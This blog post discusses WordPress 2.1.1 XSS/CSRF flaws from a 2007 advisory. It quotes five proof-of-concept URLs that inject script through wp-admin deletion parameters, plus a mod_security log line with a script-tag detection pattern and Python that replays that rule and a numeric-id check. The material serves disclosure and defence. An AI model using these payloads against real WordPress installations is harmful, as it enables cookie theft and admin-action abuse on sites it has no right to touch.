“Wordpress is dangerous, upgrade now!” seems to be a headline travelling the blogosphere in reference to the WordPress 2.1.1 release. According to numerous websites, the 2.1.1 release contains a number of vulnerabilities, and Wordpress.org is notifying its users of a dangerous release and asking everyone to download the new 2.1.2.

What I find interesting is how Wordpress.org is informing everyone that someone, aka a cracker, gained access to their file system and modified the original source of the WP 2.1.1 download. Not all users were affected? According to the WordPress XSS/CSRF advisory posted on February 27, 2007, the vulnerabilities existed within the post parameter of WordPress.

What am I talking about?

Okay, so Stefan Friedli discovered some new vulnerabilities in WordPress 2.1.1, tested them and wrote about them on February 27, 2007. The vulnerabilities were simply cross-site request forgery (CSRF) calls to the post parameter of WordPress.

According to the advisory:

This list may not be exhaustive. It illustrated that the flaw with confirmation dialogs in Wordpress is not limited to the “Delete Post” function. Fixing the validation of the post parameter as suggested by e.g. Secunia does not fix the problem and does not reduce the threat of cross-site scripting or any other web-based exploitation.

I tested the attack vectors and a few variants of each on my test server and a production server, both running WordPress 2.1.1 and mod_security.

Possible injection…

… when deleting posts as mentioned in Samenspender's advisory (unvalidated parameter: post, file: post.php)
> http://target.tld/wp-admin/post.php?action=delete&post='%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

… when deleting comments (unvalidated parameter: c, file: comment.php)
> http://target.tld/wp-admin/comment.php?action=deletecomment&p=39&c='%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

… when deleting pages (unvalidated parameter: page, file: page.php)
> http://target.tld/wp-admin/page.php?action=delete&post='%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

… when deleting categories (unvalidated parameter: cat_ID, file: categories.php)
> http://target.tld/wp-admin/categories.php?action=delete&cat_ID='%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

… when deleting comments (unvalidated parameter: c, file: comment.php)
> http://target.tld/wp-admin/comment.php?action=deletecomment&p=35&c='%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

mod_security definitely did its part by disallowing the attempt from executing successfully; the error_log showed:
[error] [client XXX.XXX.XXX.XXX] mod_security: Access denied with code 500. Pattern match "<[[:space:]]*(script|about|applet|activex|chrome)*>.*(script|about|applet|activex|chrome)[[:space:]]*>" at REQUEST_URI [hostname "target.tld"] [uri "/wp-admin/comment.php?action=deletecomment&p=35&c='%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E"] [unique_id "eN3hmkZVwpIAAAgSjcIAAAAH"]

mod_security blocked each attack vector as well. Therefore, I believe it is safe to say that if you’re operating on version 2.1.1 and have not upgraded to 2.1.2, you might be safe. At least I’m not sweating the vulnerability. It’s definitely difficult at times to keep up with WordPress 0day XSS and CSRF vulnerabilities. Hopefully the kiddies haven’t gotten a hold of any major blogs because of this attack.
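As an added illustration (not code from the original post, the advisory, or WordPress), here is the pattern from that error_log line replayed in Python over a few constructed request URIs, next to the application-side "id must be numeric" check the advisory refers to. Assumptions: mod_security URL-decodes the request before matching and matches case-insensitively; `ID_PARAMS` is a hypothetical map built from the parameters the advisory names.

```python
import re
from urllib.parse import unquote, urlsplit, parse_qs

# Pattern copied from the mod_security log line quoted above; POSIX
# [[:space:]] is written as \s. Decoding first and IGNORECASE are assumptions
# about mod_security's normalisation, not facts stated on the page.
SCRIPT_TAG_RULE = re.compile(
    r"<\s*(script|about|applet|activex|chrome)*>"
    r".*(script|about|applet|activex|chrome)\s*>",
    re.IGNORECASE | re.DOTALL,
)

# Hypothetical map: wp-admin file -> parameter the advisory calls unvalidated.
ID_PARAMS = {"post.php": "post", "comment.php": "c",
             "page.php": "page", "categories.php": "cat_ID"}


def modsec_blocks(request_uri: str) -> bool:
    """True if the quoted rule would fire on this request URI."""
    return SCRIPT_TAG_RULE.search(unquote(request_uri)) is not None


def id_params_are_numeric(request_uri: str) -> bool:
    """Application-side check: the id parameter must be a plain integer.
    This is the 'validate the post parameter' fix the advisory discusses;
    it stops the injection but, as the advisory notes, not the CSRF itself."""
    parts = urlsplit(request_uri)
    script = parts.path.rsplit("/", 1)[-1]
    wanted = ID_PARAMS.get(script)
    if wanted is None:
        return True
    values = parse_qs(parts.query, keep_blank_values=True).get(wanted, [])
    return all(v.isdigit() for v in values)


# Constructed sample request URIs; the first mirrors the page's log entry,
# the last two are benign admin requests that must not be flagged.
SAMPLE_URIS = [
    "/wp-admin/comment.php?action=deletecomment&p=35&c='%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E",
    "/wp-admin/categories.php?action=delete&cat_ID='%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E",
    "/wp-admin/post.php?action=delete&post=42",
    "/wp-admin/post.php?action=edit&post=7&title=javascript+tutorial",
]


def triage(uris=SAMPLE_URIS) -> dict:
    """Per-URI verdict from both layers: the WAF rule and the input check."""
    return {u: {"modsec": modsec_blocks(u), "id_ok": id_params_are_numeric(u)}
            for u in uris}
```

The last sample shows why the two layers are compared: the word "javascript" in a title does not trip the rule, and its numeric `post` value passes the input check, so neither layer produces a false positive on ordinary admin traffic.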

Just a little more info…

the full advisory